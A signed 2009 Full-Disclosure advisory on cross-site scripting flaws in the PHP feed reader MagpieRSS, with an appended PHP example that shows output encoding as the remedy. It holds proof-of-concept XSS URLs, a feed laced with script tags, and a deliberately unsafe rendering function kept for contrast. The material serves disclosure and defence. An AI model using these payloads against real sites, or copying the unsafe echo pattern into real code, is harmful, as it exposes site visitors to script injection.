-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -= MagpieRSS Multiple XSS Vulnerabilities =-

May 6, 2009
Author: Justin C. Klein Keane
Software: MagpieRSS (http://magpierss.sourceforge.net/)
Version Tested: magpierss-0.72
Vendor notified

Full details can also be found at http://lampsecurity.org/magpierss-vulnerability

MagpieRSS (http://magpierss.sourceforge.net/) is a PHP based RSS reader.
"MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS 1.0's
modules, RSS 2.0, and Atom. (with a few exceptions)."

Magpie suffers from multiple cross site scripting (XSS) vulnerabilities.

The first class of vulnerability is due to the failure to sanitize URL
variables in scripts included with the MagpieRSS distribution. Specifically,
the $url variable is built from $_GET['url'] and echoed back to the user,
unescaped, in:

  magpierss-0.72/scripts/magpie_simple.php
  magpierss-0.72/scripts/magpie_debug.php

The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url
variable, but populated from $_GET['rss_url'].

The second class of XSS results from MagpieRSS' failure to sanitize any of the
content of the RSS feeds it retrieves via magpierss-0.72/rss_fetch.inc. Script
placed in a feed by whoever controls it is therefore rendered as-is when the
feed is displayed, so a malicious RSS feed can inject cross site scripting
into any page that shows it.

- -=Proof of concept=-

The following links can be used to trigger XSS in Magpie's sample scripts:

http://192.168.0.2/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script
http://192.168.0.2/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script

The following malicious RSS feed can be used to exploit Magpie's RSS
rendering (feed element values, one per line):

Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage
http://justin.madirish.net
Close personal friends with Evil Eve.
en
Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script>
http://justin.madirish.net/node/343 <script>alert('xss link');</script>
foobar
Wed, 04 Mar 2009 13:42:09 +0000
justin
343 at http://justin.madirish.net

- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQD1AwUBSgRhSZEpbGy7DdYAAQKdYQcAqeMh+Xb0tNPOtaNo7cZx/ephiLSwsjYs
ij8noyk1W3ONThKYiGqju9z6493DKhAWSDbXEqkFmZCVquSwYaPNIsCUbza1wC0i
iy01RJPCcjB2jzfj4lCXNaDrzK3SZnsBlRS3jK5AYo3C9/msLA/wiSmpkltVvXxI
G7AIVFOxNVHmhyKtj+jJC0Wv+IoNj1RstKZ3kkEe1RnZsZ5ntv+gxsEkVr/Z7eiM
EmxzZwDvKMHCnuhgMG0ZcZGMcB+DEjLw5keKAvlXojEottZIESoynp4rsF0SVE4G
M5uacRMg93U=
=sY6i
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
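Both classes of issue in the advisory have the same remedy: treat the request parameter and every field that comes out of a fetched feed as untrusted, and HTML-encode it at the point of output (with a scheme allow-list for anything that becomes an href). The PHP below is an added illustration written for this page, not MagpieRSS code and not the fix the vendor shipped; it assumes a feed item is available as an associative array with 'title', 'link' and 'description' keys, and the sample item is constructed from the proof-of-concept feed above.

```php
<?php
// Added example, not part of MagpieRSS. Shows output encoding for the two
// XSS classes in the advisory: the echoed $_GET['url'] value and untrusted
// feed fields. Assumes PHP 5.4 or later.

// Encode a string for safe placement inside HTML element content or a
// double-quoted attribute value. ENT_QUOTES covers both ' and ".
function h($s)
{
    return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

// Accept only absolute http/https URLs for anything that will be placed in
// an href; javascript:, data:, and malformed values are rejected (null).
function safe_feed_url($candidate)
{
    $candidate = trim((string) $candidate);
    if (filter_var($candidate, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($candidate, PHP_URL_SCHEME));
    return in_array($scheme, array('http', 'https'), true) ? $candidate : null;
}

// The vulnerable pattern from the advisory, kept only for contrast: the raw
// request value is concatenated straight into the page.
function render_url_unsafe($url)
{
    return 'Fetching <b>' . $url . '</b>';
}

// The hardened form: encode on output. A payload such as "><script>...
// is shown as literal text instead of being parsed as markup.
function render_url_safe($url)
{
    return 'Fetching <b>' . h($url) . '</b>';
}

// Render one feed item (assumed shape: title, link, description). Every
// field is encoded; the link must also pass the scheme allow-list, otherwise
// the anchor is dropped and only the encoded title is shown.
function render_item_safe(array $item)
{
    $title = h(isset($item['title']) ? $item['title'] : '');
    $desc  = h(isset($item['description']) ? $item['description'] : '');
    $link  = safe_feed_url(isset($item['link']) ? $item['link'] : '');

    $heading = ($link === null)
        ? '<h2>' . $title . '</h2>'
        : '<h2><a href="' . h($link) . '">' . $title . '</a></h2>';

    return $heading . "\n<p>" . $desc . "</p>\n";
}

// Constructed sample input modelled on the advisory's proof-of-concept feed.
$poc_url  = '"><script>alert(\'xss\');</script>';
$poc_item = array(
    'title'       => "Disturbing<script>alert('xss title');</script> XSS",
    'link'        => "http://justin.madirish.net/node/343 <script>alert('xss link');</script>",
    'description' => "Close personal friends with Evil Eve.",
);

echo render_url_unsafe($poc_url), "\n";   // live script tag reaches the browser
echo render_url_safe($poc_url), "\n";     // same payload, fully entity-encoded
echo render_item_safe($poc_item);         // link rejected, title encoded
```

The encoding is applied where the value meets HTML rather than where it is read, so the same helper protects both the $url echo in the sample scripts and the feed fields coming out of rss_fetch.inc; validating the link separately matters because an entity-encoded `javascript:` URL is still a working URL once it sits inside an href.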